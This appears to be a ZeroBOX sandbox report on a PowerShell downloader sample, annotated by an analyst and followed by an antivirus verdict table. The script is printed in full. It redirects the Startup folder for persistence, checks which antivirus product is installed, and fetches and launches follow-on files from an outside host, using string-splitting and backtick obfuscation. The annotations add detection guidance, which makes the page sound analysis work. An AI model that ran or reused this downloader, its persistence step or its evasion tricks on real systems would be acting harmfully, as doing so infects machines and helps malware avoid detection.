Static | ZeroBOX
No static analysis available.
# Analyst annotation (sandbox sample): stage 1 prepares a persistence location before any payload is fetched.
# The concatenated fragments resolve to "C:\ProgramData\Microsoft Arts\Start\"; splitting the literal
# presumably defeats simple string matching on the path.
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"ra"+"mDa"+"t"+"a\Micr"+"oso"+"f"+"t A"+"rts"+"\S"+"ta"+"rt\")
start-sleep -s 5
# Repoints the current user's "Startup" shell-folder value at the directory created above, so items dropped
# there are treated as Startup-folder entries (persistence via Startup folder, MITRE ATT&CK T1547.001).
# Detection: alert on writes to the "Startup" value under either HKCU ...\Explorer\User Shell Folders or
# ...\Explorer\Shell Folders that point outside the user's profile.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
# Same value written to the legacy "Shell Folders" key so both locations agree.
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
# Analyst annotation: "aloshy" is the downloader stage. It branches on which security product is installed
# (checked by the presence of a product executable on disk) and pulls follow-on files from a single host.
# NOTE(review): the function's braces, the closing braces of each branch and any "else" keyword are not
# present in this listing (apparently lost in extraction), so branch boundaries below are inferred from
# the if/elseif lines only.
# Artifacts written by every AV-specific branch: C:\Users\Public\GoogleUpdate.bat, C:\Users\Public\msi.ps1,
# and "Dicord.lnk" (sic) inside the redirected Startup directory. The saved extension differs from the URL
# (e.g. 1.txt -> msi.ps1), so URL-extension filtering alone would not classify the content.
# Detection: powershell.exe spawning powershell.exe with Net.WebClient DownloadFile in the command line,
# script/batch/shortcut files created under C:\Users\Public and C:\ProgramData\Microsoft Arts\Start.
Function aloshy
# Branch 1: Avast UI executable present.
if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){
# Only this branch waits 10 seconds before downloading.
start-sleep -s 10
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
# The downloaded shortcut is launched twice, three seconds apart; what it points to is not visible here.
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
# Branch 2: ESET command-line tool present. Differs from the other branches only in fetching ITR/2.txt
# (instead of ITR/1.txt) as msi.ps1.
elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/2.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
# Branch 3: Malwarebytes tray executable present.
elseif([System.IO.File]::Exists("C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
# Branch 4: AVG UI executable present.
elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
# Remaining path: presumably the fallback taken when none of the four products is found (the variable name
# suggests a Microsoft Defender host, but no check for it is visible) - TODO confirm against the raw sample.
# The caret run is replaced with ":\Users\Pu", yielding "C:\Users\Public\".
$defender = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
# The type and method names are interleaved with backticks; this looks like obfuscation of
# Net.WebClient / DownloadFile against literal string matching. Saves NDef/all.bat as C:\Users\Public\11.ps1.
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/NDef/all.bat', $defender + '11.ps1')){
# Same path-building trick; resolves to "C:\Users\Public\" again.
$def = 'C^^^^^^^^^^^^^^^^^^blic\'.Replace("^^^^^^^^^^^^^^^^^^",":\Users\Pu")
# Saves ExDef/ss.vbs as C:\Users\Public\ss.vbs.
if((New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`F`i`l`e"('https://nyc002.hawkhost.com/~mazenne1/ExDef/ss.vbs', $def + 'ss.vbs')){
start-sleep -s 25
# Launches the downloaded VBScript through its file association; its contents are not shown on this page.
start "C:\Users\Public\ss.vbs"
start-sleep -s 20
# After the VBScript has had 20 seconds to run, the same three downloads as the AV-specific branches follow.
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/GoogleUpdate.bat', 'C:\Users\Public\GoogleUpdate.bat') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ITR/1.txt', 'C:\Users\Public\msi.ps1') }"
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://nyc002.hawkhost.com/~mazenne1/ExDef/Dicord.lnk', 'C:\ProgramData\Microsoft Arts\Start\Dicord.lnk') }"
start-sleep -s 7
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
start-sleep -s 3
Start "C:\ProgramData\Microsoft Arts\Start\Dicord.lnk"
# IEX is the built-in alias for Invoke-Expression; given the function name as its argument, it runs the
# function defined above. PowerShell script block logging (event ID 4104) would record the expanded body.
IEX aloshy
Antivirus Signature
Bkav Clean
DrWeb Clean
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
Zillya Clean
AegisLab Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren Clean
Symantec ISB.Downloader!gen221
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Clean
ClamAV Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
Cynet Clean
AhnLab-V3 Clean
VBA32 Clean
ALYac Clean
TACHYON Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
Qihoo-360 Clean
No IRMA results available.